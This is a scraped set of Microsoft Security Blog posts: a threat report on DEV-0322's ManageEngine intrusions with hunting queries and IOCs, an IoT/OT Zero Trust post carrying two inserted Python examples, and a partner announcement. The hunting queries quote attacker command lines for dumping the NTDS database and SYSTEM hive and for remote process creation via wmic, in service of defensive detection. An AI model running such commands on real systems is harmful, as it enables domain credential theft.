In this campaign, DEV-0322 was observed performing credential dumping, including creating an ntdsutil snapshot of the NTDS database and saving the HKLM\SYSTEM registry hive to disk; the observed command lines are captured in the hunting queries later in this post.

DEV-0322 also occasionally deployed a tool that reads the Security event log for Event ID 4624 (successful logon) events, collects the domains, usernames, and IP addresses from them, and writes the results to the file elrs.txt. They typically called this tool elrs.exe and launched it with cmd /c elrs.exe, the command line that the hunting query later in this post keys on.

After gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module. The observed command, which runs gac.exe against ScriptModule.dll from c:\windows\temp through a wmic process call create, is included in the hunting queries later in this post.

Installing custom IIS module

The gac.exe binary installs ScriptModule.dll into the Global Assembly Cache and then uses AppCmd.exe to register it as an IIS module. AppCmd.exe is a command-line tool included in IIS 7 and later for server management. The module hooks the IIS BeginRequest event and looks for custom commands and arguments passed in the Cookie header of incoming HTTP requests.

Figure 1: Encoded request from the controller to the victim machine

The custom IIS module supports execution of cmd.exe and PowerShell commands, and lets DEV-0322 download files from and upload files to the compromised IIS web server. The module also captures incoming authentication credentials, encodes them, and writes them to the following path:

C:\ProgramData\Microsoft\Crypto\RSA\key.dat

If this module receives the command “ccc,” it drops a file c:\windows\temp\ccc.exe. The file ccc.exe is a .NET program that launches cmd.exe with an argument and sends any output back to the controller.

Figure 2: the Base64-encoded ccc.exe contained inside the IIS module backdoor

Below is an example command line spawned from the w3wp.exe worker process after ccc.exe is dropped:

"c:\windows\temp\ccc.exe" dir

Deploying Zebracon malware

In addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.

Subsequent commands are made to <ZimbraServer>/service/soap using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:

  • Search email (e.g., <query>(in:"inbox" or in:"junk") is:unread</query>)
  • Read email
  • Send email (e.g., Subject: [AutoReply] I’ve received your mail, I will check it soon!)

These operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.

Files related to the Zebracon Trojan have the following metadata:

  • Company name:
    • Synacor. Inc.
  • File description:
    • Zimbra Soap Suites
    • Zimbra Soap Tools
  • Internal name:
    • newZimbr.dll
    • zimbra-controller-dll.dll
  • Original filename:
    • newZimbr.dll
    • ZIMBRA-SOAP.DLL

Microsoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Detections

Microsoft 365 Defender detections

Antivirus 

Microsoft Defender Antivirus detects threat components as the following malware:

  • Trojan:MSIL/Gacker.A!dha
  • Backdoor:MSIL/Kokishell.A!dha
  • Trojan:Win64/Zebracon.A!dha

Endpoint detection and response (EDR) 

Alerts with the following titles in the security center can indicate threat activity on your network:

  • DEV-0322 Actor activity detected
  • Malware from possible exploitation of CVE-2021-40539

The following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:

  • ‘Zebracon’ high-severity malware was detected
  • Anomaly detected in ASEP registry

Microsoft 365 Defender correlates any related alerts into incidents to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.

The threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.

Microsoft Sentinel detections

The indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the Microsoft Emerging Threat Feed located in the Microsoft Sentinel Threat Intelligence blade. These can be used by customers for detection purposes alongside the hunting queries detailed below.

Advanced hunting queries

Microsoft Sentinel hunting queries

Name:  DEV-0322 Command Line Activity November 2021
Description: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor’s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml

Name:  DEV-0322 File Drop Activity November 2021
Description: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor’s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml

In addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:

Microsoft 365 Defender hunting queries

Name: Surface devices with the CVE-2021-40539 vulnerability
Description: Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539.

DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2021-40539"
| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion

Name: Hunt for suspicious dropped files post-exploitation
Description: Look for suspicious files dropped by the threat actor’s post-exploitation activity.

// Look for the specific files dropped by threat actor
let files = dynamic(["C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat", "c:\\windows\\temp\\ccc.exe"]);
DeviceFileEvents
| where FileName endswith "elrs.exe" or FolderPath has_any (files)
// Increase the risk score of command accessing file also seen
| join kind=leftouter (DeviceProcessEvents
| where ProcessCommandLine contains "cmd /c elrs.exe") on DeviceId
| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName

Name: Hunt for command lines observed used by the DEV-0322 actor
Description: Look for suspicious command lines that are used as part of the threat actor’s post-exploitation activity.

// Look for command lines observed used by the threat actor
let cmd_lines = dynamic(['cmd.exe /c "wmic /node:redacted process call create "ntdsutil snapshot \\"activate instance ntds\\" create quit quit > c:\\windows\\temp\\nt.dat";', 'regsvr32 /s c:\\windows\\temp\\user64.dll', 'process call  create "cmd /c c:\\windows\\temp\\gac.exe -i c:\\windows\\temp\\ScriptModule.dll >c:\\windows\\temp\\tmp.dat"']);
DeviceProcessEvents
// Look for static cmd lines and dynamic one using regex
// Verbatim (@"...") strings keep the backslashes literal so the regex matches "reg save HKLM\SYSTEM <name>_System.HIV"
| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex @"save HKLM\\SYSTEM [^ ]*_System\.HIV" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex @"save HKLM\\SYSTEM [^ ]*_System\.HIV"
| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid
// Base risk score on number of command lines seen for each host
| extend RiskScore = count_
| project-reorder  FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName
| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName

Indicators of compromise (IOCs)

Type Indicator
SHA-256 bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5
SHA-256 e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e
SHA-256 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b
SHA-256 a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2
SHA-256 d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16
SHA-256 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090
SHA-256 ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6
SHA-256 b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665
SHA-256 b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710
SHA-256 bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da
SHA-256 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59
SHA-256 f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e
SHA-256 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428
SHA-256 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058
SHA-256 b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b

 

The post Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus appeared first on Microsoft Security Blog.

Learn how Microsoft strengthens IoT and OT security with Zero Trust

November 8th, 2021

As cyber threats grow more sophisticated and relentless, the need for Cybersecurity Awareness Month becomes more urgent every year. As part of our year-round commitment to security for all, Microsoft continues to track numerous incidents targeting both digital and physical operations for many organizations. Beyond the usual espionage and data-theft attacks aimed at IT systems, threat actors have increasingly turned their attention toward IoT devices and operational technology (OT) equipment—everything from oil pipelines1 to medical devices.2 Malicious actors have also had success in targeting supply chains, as seen in the insidious Solorigate3 and Kaseya4 attacks.

Earlier this month, we published the 2021 Microsoft Digital Defense Report to help organizations better understand this evolving threat landscape, as well as provide guidance on securing your supply chain and IoT and OT assets. In the spirit of security for all, some highlights of these chapters are presented here for easy reference.

Securing supply chains

The practice of adopting multiple tools to monitor different tiers of suppliers increases complexity, which in turn increases the odds that a cyberattack can produce a significant return for your adversary. Silos create additional problems: different teams have different priorities, which can lead to different risk priorities and practices. This inconsistency creates duplicated effort and gaps in risk analysis. Suppliers’ personnel are also a top concern: organizations want to know who has access to their data so they can protect themselves from human liability, shadow IT, and other insider threats.

For supplier risk management, an always-on, automated, integrated approach is needed, but current processes aren’t well-suited to the task. To secure your supply chain, it’s important to have a repeatable process that will scale as your organization innovates. At Microsoft, we group our investments into nine secure supply chain (SSC) workstreams to methodically evaluate and mitigate risk in each area:

  • First-party engineering systems for hardware and software
  • Firmware and driver security
  • Physical security
  • Manufacturing security
  • Logistics security
  • Supplier security
  • Trust chain governance and resilience
  • Security validations and assurances
  • Monitoring and detections

Figure 1: Nine areas of investment for a secure end-to-end supply chain.

For supply chain risk management, having integrated solutions and greater visibility into who ultimately has access to an organization’s data are top priorities. While there are many places to begin a Zero Trust journey, instituting multifactor authentication (MFA) should be your first step.

From the White House

On May 12, 2021, the White House issued Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity outlining steps for federal agencies and their technology providers to enhance supply chain security. For software providers, the EO calls for requirements to enhance resistance to attack, including secure software development practices, software verification and vulnerability checks, a software bill of materials (SBOM), a vulnerability disclosure program, and other secure practices.

For federal agency users of software with privileged access, EO 14028 calls for implementing security measures published by the National Institute of Standards and Technology (NIST). Microsoft has long been invested in developing best practices for secure software development, and we’ve contributed to efforts to define industry-wide practices and consensus standards, including through SAFECode, ISO/IEC, and NIST’s National Cybersecurity Center of Excellence (NCCoE) on the Implementing a Zero Trust Architecture project.

IoT and OT security

With the prevalence of cloud connectivity, IoT and OT have become another part of your network. And because IoT and OT devices are typically deployed in diverse environments—from inside factories or office buildings to remote worksites or critical infrastructure—they’re exposed in ways that can make them easy targets. When you add in privacy concerns and regulatory compliance, it’s clear that a holistic approach is needed for enabling seamless security and governance across all your devices.

Securing IoT solutions with a Zero Trust security model is built upon five requirements:

  • Implement strong identity to authenticate devices: Register devices, issue renewable credentials, employ passwordless authentication, and use a hardware root of trust to ensure identity before making decisions.
  • Maintain least privilege access to mitigate blast radius: Implement device and workload access controls to limit any potential damage from identities that may have been compromised, or those running unapproved workloads.
  • Monitor device health to gate access or flag for remediation: Check security configurations, assess for vulnerabilities and insecure passwords, and monitor for active threats and anomalous behavioral alerts to build risk profiles.
  • Deploy continual updates to keep devices healthy: Utilize a centralized configuration and compliance management solution, as well as a robust update mechanism, to ensure devices are up to date and healthy.
  • Maintain security monitoring and response: Employ proactive monitoring to rapidly identify unauthorized or compromised devices.
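The five requirements above combine into a single access decision for each device. The Python gate below is an added example, not code from the report or from any Microsoft product: it admits a device only when its identity is registered and attested and its renewable credential is still valid, quarantines unhealthy or out-of-date devices onto an update-only channel, scopes healthy devices to their approved role, and emits a monitoring record for every decision. The field names, role names, scope strings, firmware version and the fleet records are all assumptions constructed for the example.

```python
"""Zero Trust access gate for IoT devices (added example, not Microsoft's code).

Requirement 1 (strong identity): unregistered, unattested or expired identities are denied.
Requirements 3 and 4 (health, updates): unhealthy or stale devices get only an update channel.
Requirement 2 (least privilege): healthy devices get the scopes of their approved role.
Requirement 5 (monitoring): every decision is turned into an event record.
All names and values below are assumptions made for this example.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Fixed clock so the example is reproducible; a deployment would use datetime.now(timezone.utc).
NOW = datetime(2021, 11, 8, tzinfo=timezone.utc)
LATEST_FIRMWARE = "2.4.1"          # assumed current release for this fleet (exact-match check)
RENEW_WINDOW = timedelta(days=7)   # offer credential renewal this close to expiry

# Least-privilege scope sets per approved workload role (assumed role and scope names).
ROLE_SCOPES = {
    "sensor": {"telemetry:write"},
    "gateway": {"telemetry:write", "telemetry:read", "config:read"},
}


@dataclass
class Device:
    device_id: str
    registered: bool               # present in the device registry
    attested: bool                 # hardware root of trust confirmed the identity
    credential_expires: datetime   # renewable credential, not a permanent secret
    firmware_version: str
    default_password: bool         # insecure-password finding from the health scan
    anomaly_alerts: int            # open behavioural alerts from monitoring
    role: str


@dataclass
class Decision:
    action: str                    # "allow", "remediate" or "deny"
    scopes: set = field(default_factory=set)
    reasons: list = field(default_factory=list)


def evaluate(dev: Device, now: datetime = NOW) -> Decision:
    d = Decision(action="allow")
    # Requirement 1: without a verified identity there is no decision in the device's favour.
    if not (dev.registered and dev.attested):
        return Decision("deny", reasons=["identity not verified"])
    if dev.credential_expires <= now:
        return Decision("deny", reasons=["credential expired"])
    # Requirements 3 and 4: collect health and update findings; any finding means quarantine.
    if dev.default_password:
        d.reasons.append("factory-default password")
    if dev.anomaly_alerts:
        d.reasons.append(f"{dev.anomaly_alerts} open anomaly alert(s)")
    if dev.firmware_version != LATEST_FIRMWARE:
        d.reasons.append(f"firmware {dev.firmware_version} != {LATEST_FIRMWARE}")
    if d.reasons:
        d.action = "remediate"
        d.scopes = {"update:receive"}   # just enough to get patched, nothing else
        return d
    # Requirement 2: a healthy device gets only the scopes of its approved role.
    d.scopes = set(ROLE_SCOPES.get(dev.role, set()))
    if dev.credential_expires - now <= RENEW_WINDOW:
        d.scopes.add("credential:renew")
        d.reasons.append("credential near expiry; renewal offered")
    return d


def monitoring_event(dev: Device, d: Decision, now: datetime = NOW) -> dict:
    """Requirement 5: every decision becomes a record the SOC can alert on."""
    return {"ts": now.isoformat(), "device": dev.device_id, "action": d.action,
            "scopes": sorted(d.scopes), "reasons": d.reasons}


# Constructed fleet covering each branch of the gate.
FLEET = [
    Device("pump-01", True, True, NOW + timedelta(days=30), "2.4.1", False, 0, "sensor"),
    Device("gw-02", True, True, NOW + timedelta(days=3), "2.4.1", False, 0, "gateway"),
    Device("cam-03", True, True, NOW + timedelta(days=30), "2.3.0", True, 0, "sensor"),
    Device("plc-04", True, True, NOW - timedelta(days=1), "2.4.1", False, 0, "sensor"),
    Device("unknown-05", False, False, NOW + timedelta(days=30), "2.4.1", False, 2, "sensor"),
]


def gate_fleet(fleet=FLEET):
    """Evaluate every device and return the decisions keyed by device id."""
    return {dev.device_id: evaluate(dev) for dev in fleet}


if __name__ == "__main__":
    for dev in FLEET:
        print(monitoring_event(dev, evaluate(dev)))
```

The design choice worth noting is that the "remediate" outcome is not a softer "allow": a device with a default password or old firmware loses its role scopes entirely and keeps only the channel needed to be brought back to health, so a compromised identity cannot trade on a partial pass.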

An attacker can reach a factory through IoT: reconnaissance, then an email or direct message, then an exploit, then lateral movement, and finally entry into the factory environment when an employee who has been working from home with an IoT or OT device transitions back into the factory.

Figure 2: How an attacker can get into an enterprise through IoT.

“Attackers will choose the ‘soft targets’ as a point of ingress. Spear phishing or similar attacks allow access to IT systems that can then provide a pathway for attackers to reach OT systems, and the reverse is also possible. In one example, attackers used an aquarium system to access a casino’s high-roller databases, demonstrating that any device with connectivity can present a motivated attacker with an opening.”—2021 Microsoft Digital Defense Report

Default passwords cause problems

Microsoft’s sensor network provides us with raw data on more than 280,000 attacks, including password data. Unsurprisingly, we saw that 96 percent of attacks used a password with fewer than 10 characters. Within these password attempts, only 2 percent included a special character and 72 percent didn’t even contain a number. The word “admin” was found more than 20 million times in IoT passwords over a 45-day period.

We’ve observed the password “admin” used in IoT devices over 20 million times in 45 days of our telemetry. The username “root” was used nearly 10 million times.

Figure 3: Prevalence of common passwords in IoT and OT settings.

Maintain your IoT just like IT

It’s essential for organizations to assess the security of their IoT and OT systems with the same rigor applied to IT systems. While PCs are routinely required to have updated certificates, IoT devices are often deployed with factory-default passwords. Attackers are also focusing on how IoT and OT interact, which brings real dangers. Industrial control systems (ICS) are often retrofitted with remote capabilities, meaning virtual attacks can cause physical harm.

Microsoft supported a research study conducted by the Global Cyber Alliance (GCA) to demonstrate the effectiveness of commonly recommended controls in preventing attacks. GCA’s analysis of real attack data shows that default passwords factory-set by device manufacturers, or weak passwords set by users, represent the most exploited security vulnerability for IoT devices. Their findings can be boiled down to four simple takeaways for IoT and OT security:

  1. No default passwords.
  2. Implement a vulnerability disclosure policy.
  3. Keep software updated.
  4. Continuously monitor IoT communication for unauthorized communications and attacks.
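The password telemetry above and the four GCA takeaways both come down to checks a defender can run on their own data. The Python audit below is an added example, not Microsoft’s or GCA’s tooling: it computes the same kind of metrics as Figure 3 from constructed honeypot login-attempt lines (share of passwords under 10 characters, with a special character, without a digit, most common usernames), then checks a constructed device inventory against each of the four takeaways. The log format, field names, default-credential list, firmware-age threshold and all sample values are assumptions made for the example.

```python
"""IoT credential-hygiene audit (added example; not Microsoft's or GCA's tooling).

Part 1 measures attempted passwords from constructed honeypot log lines.
Part 2 maps a constructed device inventory onto the four GCA takeaways:
no default passwords, a vulnerability disclosure contact, current software,
and only authorized communications. Formats, thresholds and data are assumptions.
"""
import re
from collections import Counter

# Constructed honeypot log lines; the addresses are from the RFC 5737 documentation range.
LOG_LINES = [
    '2021-11-08T03:14:05Z honeypot sshd: login attempt user="admin" password="admin" src=203.0.113.7',
    '2021-11-08T03:14:09Z honeypot sshd: login attempt user="admin" password="admin" src=203.0.113.7',
    '2021-11-08T03:14:12Z honeypot sshd: login attempt user="root" password="root" src=203.0.113.7',
    '2021-11-08T03:15:01Z honeypot sshd: login attempt user="admin" password="1234" src=203.0.113.9',
    '2021-11-08T03:15:03Z honeypot sshd: login attempt user="root" password="toor" src=203.0.113.9',
    '2021-11-08T03:15:08Z honeypot sshd: login attempt user="admin" password="password" src=203.0.113.9',
    '2021-11-08T03:16:20Z honeypot sshd: login attempt user="user" password="Passw0rd!" src=203.0.113.12',
    '2021-11-08T03:16:44Z honeypot sshd: login attempt user="admin" password="admin" src=203.0.113.12',
    '2021-11-08T03:17:02Z honeypot sshd: login attempt user="root" password="123456" src=203.0.113.12',
    '2021-11-08T03:17:30Z honeypot sshd: login attempt user="admin" password="Tr0ub4dor&3-long" src=203.0.113.15',
    '2021-11-08T03:18:11Z honeypot sshd: login attempt user="pi" password="raspberry" src=203.0.113.15',
    '2021-11-08T03:18:40Z honeypot sshd: login attempt user="admin" password="admin123" src=203.0.113.15',
    '2021-11-08T03:20:00Z honeypot sshd: connection closed src=203.0.113.9',   # no credentials: skipped
]

ATTEMPT_RE = re.compile(r'user="(?P<user>[^"]*)" password="(?P<pw>[^"]*)"')
SPECIAL_RE = re.compile(r"[^A-Za-z0-9]")


def parse_attempts(lines):
    """Return (username, password) pairs; lines without both fields are skipped."""
    return [(m.group("user"), m.group("pw"))
            for m in (ATTEMPT_RE.search(line) for line in lines) if m]


def password_stats(attempts):
    """Whole-number percentages, in the same shape as the figures quoted in the report."""
    n = len(attempts)
    pct = lambda k: round(100 * k / n) if n else 0
    pws = [p for _, p in attempts]
    return {
        "total": n,
        "pct_short": pct(sum(len(p) < 10 for p in pws)),
        "pct_special": pct(sum(bool(SPECIAL_RE.search(p)) for p in pws)),
        "pct_no_digit": pct(sum(not any(c.isdigit() for c in p) for p in pws)),
        "top_users": Counter(u for u, _ in attempts).most_common(2),
        "top_passwords": Counter(pws).most_common(2),
    }


# Constructed factory-default pairs; a real audit would use the vendor's documented defaults.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("root", "root"), ("admin", "password")}
MAX_FIRMWARE_AGE_DAYS = 180   # assumed policy threshold


def is_weak(password):
    return (len(password) < 10 or not any(c.isdigit() for c in password)
            or SPECIAL_RE.search(password) is None)


def audit_device(dev):
    """Map one inventory record to findings, one per GCA takeaway it violates."""
    findings = []
    if (dev["user"], dev["password"]) in DEFAULT_CREDENTIALS:
        findings.append("default credential")                       # takeaway 1
    elif is_weak(dev["password"]):
        findings.append("weak password")                            # takeaway 1
    if not dev.get("vdp_contact"):
        findings.append("no vulnerability disclosure contact")      # takeaway 2
    if dev["firmware_age_days"] > MAX_FIRMWARE_AGE_DAYS:
        findings.append("firmware out of date")                     # takeaway 3
    unexpected = sorted(set(dev["observed_peers"]) - set(dev["allowed_peers"]))
    if unexpected:
        findings.append("unauthorized communication to " + ", ".join(unexpected))  # takeaway 4
    return findings


def audit_fleet(devices):
    return {dev["id"]: audit_device(dev) for dev in devices}


# Constructed inventory: one device violating every takeaway, one clean, one with a weak password.
INVENTORY = [
    {"id": "cam-01", "user": "admin", "password": "admin", "firmware_age_days": 400, "vdp_contact": None,
     "allowed_peers": ["telemetry.example.internal"],
     "observed_peers": ["telemetry.example.internal", "198.51.100.23"]},
    {"id": "plc-02", "user": "operator", "password": "V4lve-Room-7!", "firmware_age_days": 30,
     "vdp_contact": "security@example.com", "allowed_peers": ["scada.example.internal"],
     "observed_peers": ["scada.example.internal"]},
    {"id": "sensor-03", "user": "admin", "password": "sunshine", "firmware_age_days": 90,
     "vdp_contact": "security@example.com", "allowed_peers": ["telemetry.example.internal"],
     "observed_peers": ["telemetry.example.internal"]},
]

if __name__ == "__main__":
    print(password_stats(parse_attempts(LOG_LINES)))
    for dev_id, findings in audit_fleet(INVENTORY).items():
        print(dev_id, findings or ["ok"])
```

The two halves answer different questions: the log statistics show what attackers are trying against the fleet, while the inventory audit shows which of your own devices would fall to exactly those attempts. Run both periodically and the gap between them is the remediation backlog.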

Learn more

Learn how Microsoft Defender for IoT can secure your IoT and OT devices.

To find out more about protecting your organization against supply chain and IoT/OT attacks, including the seven properties of highly secured devices, download the 2021 Microsoft Digital Defense Report. Also, see our past blog posts providing information for each themed week of Cybersecurity Awareness Month 2021:

Be sure to visit our Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1. Hackers Breached Colonial Pipeline Using Compromised Password, William Turton and Kartikay Mehrotra, Bloomberg, 4 June 2021.

2. Microsoft Warns of 25 Critical Vulnerabilities in IoT, Industrial Devices, Elizabeth Montalbano, Threatpost, 30 April 2021.

3. Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop, Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC), Microsoft Cyber Defense Operations Center (CDOC), Microsoft Security, 20 January 2021.

4. Kaseya ransomware attack sets off race to hack service providers -researchers, Joseph Menn, Reuters, 3 August 2021.

The post Learn how Microsoft strengthens IoT and OT security with Zero Trust appeared first on Microsoft Security Blog.


Discover what’s new and gain technical expertise from MISA at Ignite

November 4th, 2021 No comments

It’s hard to believe we’re so close to the end of another year, and what a year it’s been. For too brief a time in some places, our masks were tossed away, only to find us digging them out of drawers again not long after. But masked up or not, it’s been good to see local restaurants buzzing with activity again, along with fans enjoying sporting events, concerts, and even some shows on Broadway. There’s a sense of expectation in the air, and I’m excited to see what 2022 has in store for all of us.

That renewed optimism can be seen in the continued growth of the Microsoft Intelligent Security Association (MISA) member base—now reaching 275 partners, with 273 product integrations and 243 managed service offerings. We have high expectations for the remainder of this fiscal year, including doubling our membership to roughly 450 as we continue partnering with even more leading-edge cybersecurity firms. We’re also expanding our product portfolio and are excited to announce that two new products for compliance, risk, and privacy are joining the MISA lineup.

Welcoming new compliance, risk, and privacy solutions

Microsoft compliance helps our customers comply with national, regional, and industry-specific requirements governing the collection and use of data. Through MISA, members get support in building managed services and integrations that help them:

  • Identify and remediate critical risks within your organization.
  • Safeguard sensitive data across clouds, apps, and endpoints.
  • Assess compliance and respond to legal and regulatory requirements.

Advanced Audit in Microsoft 365

With Advanced Audit in Microsoft 365, you can conduct forensic and compliance investigations with visibility into user activities across Microsoft 365 services. Using audit log search in the Microsoft 365 compliance center and the Office 365 Management Activity API, Advanced Audit enables audit logs to be retained for up to 10 years, provides access to crucial events that determine the scope of a compromise, and helps with ongoing regulatory, legal, and internal obligations. Customers can specify how long to retain audit records according to a priority level, ensuring that specific policies take priority over others.

“Joining MISA brings our relationship with Microsoft to the next level, enabling seamless integrations for our joint customers using Office 365 and more,” said John Coyle, Vice President Business Development, Sumo Logic. “Our cloud-native integration with Microsoft Office 365’s Advanced Auditing capabilities enables customers to apply Sumo Logic’s powerful Continuous Intelligence Platform and Cloud SIEM, providing clear, detailed trails for rapid investigation of user activity to quickly identify potential breaches and scope of compromise in Microsoft Office 365 data.”

Privacy Management for Microsoft 365

Privacy Management for Microsoft 365 helps companies safeguard personal data and build a privacy resilient workplace by proactively identifying and protecting against privacy risks, such as data hoarding, data transfers, and data oversharing—empowering information workers to make smart data-handling decisions while automating and managing subject requests at scale. Privacy Management is available within the Microsoft 365 compliance center.

With our new Privacy APIs, we’re enabling a broader partner ecosystem to integrate with Privacy Management for Microsoft 365. This integration enables our partners to build solutions that automate the Microsoft 365 portion of subject rights requests. This helps our joint customers ensure that they are compliant with an ever-growing number of regulations across Microsoft 365, as well as non-Microsoft data sources.

“Joining MISA enhances our relationship with Microsoft and our commitment to providing a unified solution for organizations to automate their data security and privacy operations across all their structured and unstructured data systems,” said Vivek Kokkengada, Vice President of Products, Securiti. “Our new integration with Privacy Management for Microsoft 365 using Microsoft’s new Privacy APIs enables our joint customers to automatically fulfill the Microsoft 365 portion of subject rights requests within Privacy Management and ensure compliance with an ever-growing number of privacy regulations globally. Being a MISA member allows us to work closely with the Microsoft teams and stay on the forefront of new strategic integration opportunities to add value to our joint customers.”

Microsoft investing $20 billion in cybersecurity

During the White House Cybersecurity Summit on August 25, 2021, Microsoft Chairman and Chief Executive Officer Satya Nadella shared that the company will quadruple our cybersecurity investments, investing $20 billion to advance our security solutions over the next five years, and $150 million in technical services to help federal, state, and local governments upgrade their security protection. We will also expand partnerships with community colleges and non-profits for cybersecurity training. As many organizations are facing a shortage of cybersecurity professionals, we want to ensure everyone has and uses the protection available today. Watch chairman and president of Microsoft Brad Smith’s video announcement on CNBC.

Lower marketplace fees spur reseller engagement

As software needs rise, customers need to streamline how they buy and deploy software. With more than 30,000 solutions published, the commercial marketplace—Microsoft AppSource and Microsoft Azure Marketplace—is how we connect our customers and partners. To help drive these customer and partner connections, we’ve reduced fees to just 3 percent—down from an industry standard of 20 percent—for every transactable application published in the commercial marketplace. This reduction enables higher margins for partners while simplifying the fee structure.

Independent software vendors (ISVs) with transactable commercial marketplace offers can now set one price for customers and another price for Microsoft Cloud Solution Provider (CSP) partners. This allows ISVs to provide margin to their CSP partners, while CSP partners can also resell outside the commercial marketplace. This added flexibility can help create stronger connections among partners while incentivizing ISVs to share margins with resellers, making it more profitable for partners to sell Microsoft commercial marketplace offers.

Unlock this opportunity and gain access to millions of customers by publishing a solution and selling with us.

Securing the future with Zero Trust

The recent string of disastrous ransomware attacks has shown all too clearly that traditional perimeter-based security can’t keep up with the complexity of today’s decentralized workplace.1 Shadow IT, hybrid work, and the proliferation of endpoints across IoT leave security teams stretched thin. Zero-day vulnerabilities, also known as unknown weaknesses in a network or software, have been implicated in recent attacks where threat actors breached organizations without being detected, giving them ample time to map internal networks, exfiltrate data, and locate additional attack vectors. At least 66 zero-day attacks have been found this year—almost twice the total of the previous year.2

Zero Trust is the essential security strategy for today’s reality. In 2020, the global pandemic compelled nearly every organization to embrace a Zero Trust strategy as employees went remote, virtual private networks (VPNs) were breached or overwhelmed, and digital transformation became critical to organizational sustainability. Governments and businesses worldwide recognized this imperative. In keeping with Section 3 of Executive Order 14028, Microsoft adheres to federal standards for Zero Trust as developed by the National Institute of Standards and Technology (NIST):

  • All resource authentications are dynamic and strictly enforced before allowing access.
  • Trust is evaluated before access is granted, and then only with the least privilege needed to complete the task.
  • Assets should always act as if an attacker is present on the enterprise network.

At Microsoft, we’ve distilled these tenets into three Zero Trust principles: verify explicitly, use least privileged access, and assume breach. These principles form our strategic guidance toward customers, software development, and our global security posture.

Graphic depicting Microsoft's three principles of Zero Trust: Verify explicitly, use least privileged access, and assume breach.

Learn more

To assess your organization’s progress in the Zero Trust journey, use our Zero Trust Assessment tool. If you’d like to learn from our experience, Chief Information Security Officer Bret Arsenault and his team share insights from Microsoft’s Zero Trust journey over at Microsoft Inside Track. Finally, to understand how ISVs can integrate with Microsoft products to create Zero Trust solutions, see our Zero Trust integration guidance.

To learn more about MISA and other new developments, you can view a list of the Microsoft Ignite on-demand sessions here.

To learn more about upcoming big announcements, visit our latest blog posts:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


